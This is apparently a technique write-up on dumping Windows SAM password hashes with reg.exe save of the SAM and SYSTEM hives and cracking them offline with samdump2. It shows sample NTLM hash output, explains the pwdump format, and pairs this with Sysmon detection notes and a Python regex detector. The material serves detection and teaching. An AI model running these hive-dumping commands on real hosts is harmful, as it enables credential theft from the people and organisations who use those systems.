Dumping Hashes from SAM via Registry
Security Accounts Manager (SAM) credential dumping with a living-off-the-land binary (reg.exe).

Execution

Dumping the registry hives required for hash extraction (the SAM hive holds the hashes, the SYSTEM hive holds the boot key needed to decrypt them):

```
reg save hklm\system system
reg save hklm\sam sam
```
Once the files are dumped and exfiltrated, we can dump hashes with samdump2 on Kali:

```
[email protected]~/tools/mitre/pwdump# samdump2 system sam
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f288c9a9aee917e19d4b21928b98268:::
low:1003:aad3b435b51404eeaad3b435b51404ee:4bdaf9484819a077562ebeefaed6ca75:::
```

Each line is in pwdump format, `username:RID:LM hash:NT hash:::`. The LM field `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty string, which means LM hashing is disabled on the host and only the NT hash carries the password; `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty password, so the two disabled built-in accounts have no password set.

Observations

Sysmon process-creation logs (Event ID 1) with command lines will reveal credential dump attempts from the registry as expected: the `reg.exe` process is logged with the full `reg save hklm\sam` / `reg save hklm\system` command line and its parent process.
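A minimal detection for the Sysmon observation above, as an added example that is not part of the original page: it scans constructed Sysmon Event ID 1 records for `reg.exe save` of a credential hive. It generalizes slightly beyond the page by also accepting the long `HKEY_LOCAL_MACHINE` hive prefix, quoted hive paths, and the SECURITY hive (an assumption, since the page only shows SAM and SYSTEM).

```python
import re
from typing import List, Optional

# Constructed sample Sysmon Event ID 1 records, reduced to the fields the
# detection needs. Real events carry many more fields; these values are invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system system",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg  save HKLM\SAM c:\temp\sam",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\microsoft",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe sam", "ParentImage": r"C:\Windows\explorer.exe"},
    # Network-connection event (ID 3): no command line to inspect, must be skipped.
    {"EventID": 3, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam sam"},
]

# reg.exe accepts both the short (HKLM) and the long (HKEY_LOCAL_MACHINE) hive
# prefix, and the hive path may be quoted. SECURITY is an assumed extra hive.
HIVE_RE = re.compile(
    r"""\breg(?:\.exe)?\s+save\s+["']?(?:hklm|hkey_local_machine)\\(sam|system|security)\b""",
    re.IGNORECASE,
)

def is_hive_dump(event: dict) -> Optional[str]:
    """Return the saved hive name if the event is a reg.exe credential-hive save, else None."""
    if event.get("EventID") != 1:  # only process creation carries the command line we need
        return None
    m = HIVE_RE.search(event.get("CommandLine", ""))
    return m.group(1).lower() if m else None

def find_hive_dumps(events) -> List[dict]:
    """Return one alert record per matching event, keeping the fields an analyst triages on."""
    alerts = []
    for ev in events:
        hive = is_hive_dump(ev)
        if hive:
            alerts.append({"hive": hive, "image": ev.get("Image"),
                           "parent": ev.get("ParentImage"), "cmd": ev["CommandLine"]})
    return alerts

if __name__ == "__main__":
    for a in find_hive_dumps(SAMPLE_EVENTS):
        print(f"[ALERT] reg.exe saved {a['hive'].upper()} hive: {a['cmd']!r} (parent: {a['parent']})")
```

The same pattern matched against the Sysmon `CommandLine` field is what a SIEM rule would carry; the parent image is kept because a `reg.exe` save spawned from an unexpected parent is the stronger signal.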